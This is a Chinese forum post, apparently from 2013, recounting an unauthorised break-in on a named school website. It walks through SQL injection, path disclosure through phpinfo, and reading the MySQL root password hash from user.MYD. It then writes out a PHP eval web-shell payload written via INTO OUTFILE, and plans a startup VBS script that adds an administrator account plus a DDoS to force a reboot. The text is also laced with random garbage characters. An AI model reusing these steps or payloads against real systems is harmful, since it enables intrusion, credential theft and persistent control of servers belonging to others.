第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏1 Y- f2 K# c: g5 U
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!/ X7 P+ B# W2 {0 v6 d& W
; q2 q* g# ^+ s% I% I: G/ I* {! u0 @2 k7 c
% @7 p3 [. k- g2 t) W- N常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 % U9 r$ u- A- w
- O4 O3 o$ t6 `
那么想可以直接写入shell ,getshell有几个条件:- X5 b4 U' j* [# u& c' V5 D
1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF ) c7 }5 b$ D" K. y% y
" p1 Q, c( {' R; d) F8 {9 w试着爆绝对路径:
7 x# T4 T* I4 M& E4 d, _. k. O1./phpMyAdmin/index.php?lang[]=1 / z4 B4 y+ m& `, P3 ^# K7 \- v
2./phpMyAdmin/phpinfo.php
7 c2 O& ]- H6 Z: w4 s; X6 K- j3./load_file()
: I2 h* X$ c) a3 ^4./phpmyadmin/themes/darkblue_orange/layout.inc.php % j7 _4 B1 I$ y; ^+ h5 h7 K& w( ]
5./phpmyadmin/libraries/select_lang.lib.php ! L0 E2 Q, u, C. R$ W; f3 p
6./phpmyadmin/libraries/lect_lang.lib.php
3 @3 _% D/ ~8 Z) n1 s7./phpmyadmin/libraries/mcrypt.lib.php 2 I* e% Z7 H- p0 j5 Y% [
8./phpmyadmin/libraries/export/xls.php ; |" f+ j. s; M! [
) `* \: H0 ~8 p& P r! S7 e& r
均不行...........................
# V$ }3 t* V+ Y2 l V( H- F& L1 p0 f7 Y
8 @& P: f5 b: D/ X u* S" w御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
+ Q" c$ D3 X; _0 i) R0 x2 L3 h. {, p2 {
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
/ {( s! e# z3 f7 s5 z1 A8 R/ V9 @/ e1 t* z m T
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败 : ?) w. @2 P3 j f+ e* I
: P( _* ~+ |$ ]: z
敏感东西: http://202.103.49.66/Admincp.php 社工进不去........... " G% ~( F6 m% J: ?! v& C5 C4 V
+ l# x7 C3 J' x4 o3 S( M
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
$ }. Z, z, _% F' C7 |# Z# n" {% M' `
http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini
- G& I- a2 u/ n, v5 s; d* E+ S
4 S' ~" N7 S' R) D% U l* K自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD 1 e1 c& p& o% t4 m! }7 q
, ]1 I% ]) `; e/ ^成功读到root密码: - B& N( F8 L U6 p1 I" {
! ?* O0 _) P. U6 I
17---- r(0072) 3 d; `; I( G: H7 n5 i
18---- o(006f)
/ G+ [' H# K7 ?19---- o(006f)
" {, D# w7 k3 j; j' X# H# }20---- t(0074) , G+ n! k! `7 M% A& v! J: s
21---- *(002a) ' S+ ^6 n5 G! I/ E& N" c Y
22---- 8(0038) " _8 p% ^4 L- e/ B9 q
23---- 2(0032)
; A! Q) ~- q2 Q# v" E! Q24---- E(0045) 9 T# x+ n9 U |& j" q
25---- 1(0031) ! ~& j# C; ]" l" F: G
26---- C(0043) 0 i% H# B) v& k+ V* R$ W; ^ K. D
27---- 5(0035)
( ?; C* ?( Y$ e* h" J+ L28---- 8(0038) " G% y8 o" Y7 X* N8 K8 C
29---- 2(0032)
) v# G) z+ A+ o& z30---- 8(0038) 2 }: Y8 X. {* V* k" n. ?
31---- A(0041) % [/ B" l) F( J$ K# W r6 h
32---- 9(0039)
/ ^$ n, Q4 ?4 Q' h9 E2 b) c33---- B(0042)
; m: i/ X0 x& V34---- 5(0035)
. z% V0 N" j! k1 I+ p35---- 4(0034)
# G: N; P4 Y. K! K' I% _36---- 8(0038)
6 H, I: F8 C; {& B37---- 6(0036) 5 F! v" {4 a; t, y0 }8 _
38---- 4(0034)
* t0 `$ Y' w! a/ B3 `- A! }' ^39---- 9(0039)
. d6 Y: E. ~9 u" L* U. V3 w( S40---- 1(0031) ; U5 Y' N( }9 s) t% w z& G
41---- 1(0031) 5 E$ @+ }! I# R( T: F; ?' n* q4 `/ K
42---- 5(0035)
8 N- M' v& S' \5 x+ E$ P43---- 3(0033)
$ q. q( L/ s' I8 d+ v44---- 5(0035) 2 ?/ ]7 J& O1 R- M
45---- 9(0039)
1 @& g* L( B$ r; Z9 n, ~! ]% P# M46---- 8(0038)
+ H% R5 @( l: T* R( F2 ~: D47---- F(0046) ; O/ X- w. R6 }: P$ J" m
48---- F(0046)
3 Q7 C) J) ]" I' p, H0 F" k49---- 4(0034)
+ m. J* y# ^- Z0 W$ Y" s50---- F(0046) - T" _7 T6 W# q7 ^; E
51---- 0(0030)
) V- M8 h" O4 @) B; y52---- 3(0033) - l+ s0 w+ d8 N1 M5 ~8 f' j; z
53---- 2(0032) 9 ]' N5 ]3 R7 G
54---- A(0041) + h! \5 E" n, s$ E: _
55---- 4(0034)
; I$ p- L6 U9 [ d; b- D56---- A(0041)
6 j. e; U% A9 Q6 z57---- B(0042) ; {8 R: p- A# Z" }6 J
58---- *(0044)
$ `( U. ]0 }1 }$ d$ f59---- *(0035)
% x3 a& h6 }& F9 m/ c v4 F60---- *(0041) 9 \; n' h# W4 p0 F3 o9 \8 e
61---- *0032)
1 g; @2 [* ]$ t
. l5 I4 \3 z0 f解密后成功登陆phpmyamin # V% k4 w" @( k- ]; O- j
9 v+ ~ ?1 ?; |% Q' | ?
1 @2 m/ Y5 a+ J, D' l" F' P
# e! g6 C/ `7 b) C$ s9 w; Z& p2 Y% k$ R( o
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php' ( u2 @2 i% o! R2 T; W) B
a# y) g/ Q' [9 t成功执行,拿下shell,菜刀连接: 4 Z1 m; d8 ]. f/ }2 p: y' E
$ D' i! w. U+ H& U/ m# k @9 p' ]4 g5 E服务器不支持asp,aspx,php提权无果...................
- b5 D- q+ R" L$ v% z& ^4 D2 |8 b3 B" u) L
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
; j! O$ v1 E* d; h1 y4 Q服务器上已经有个隐藏帐号了
% w6 D! q h0 x* T% p5 T. U别名 administrators
; S. `! X7 L0 x% @+ E注释 管理员对计算机/域有不受限制的完全访问权 ; K. }, t" R+ i& p$ O( c. R6 `
成员
# Z/ c/ }4 f" T! a3 _6 A-------------------------------------------------------------------------------$ ^! ~& e) X$ y- u
admin
6 O7 p' ~8 Q- I, y1 _Administrator) z& S% z, f4 u6 U! A) F
slipper$
0 ~6 b- `* W1 h4 S( n/ M2 psqluser, N# B3 T$ T" S
命令成功完成。
+ s4 L# O+ B2 ?* `0 ~: k! f; z: Z
& h2 C+ b2 a) K& k9 ?) w! V服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
5 `, h! p# T i* o; h% }$ ~! N7 J& P
ddos服务器重启,不然就只能坐等服务器重启了...............................9 F+ w: @% c1 I7 s8 D8 J+ d
, y3 W! g" I2 o& F3 |
& G3 N$ _7 O+ C! k0 R7 N
| 
发表于 2013-1-11 21:32:15
收藏
支持
反对
发表于 2013-5-20 15:28:12
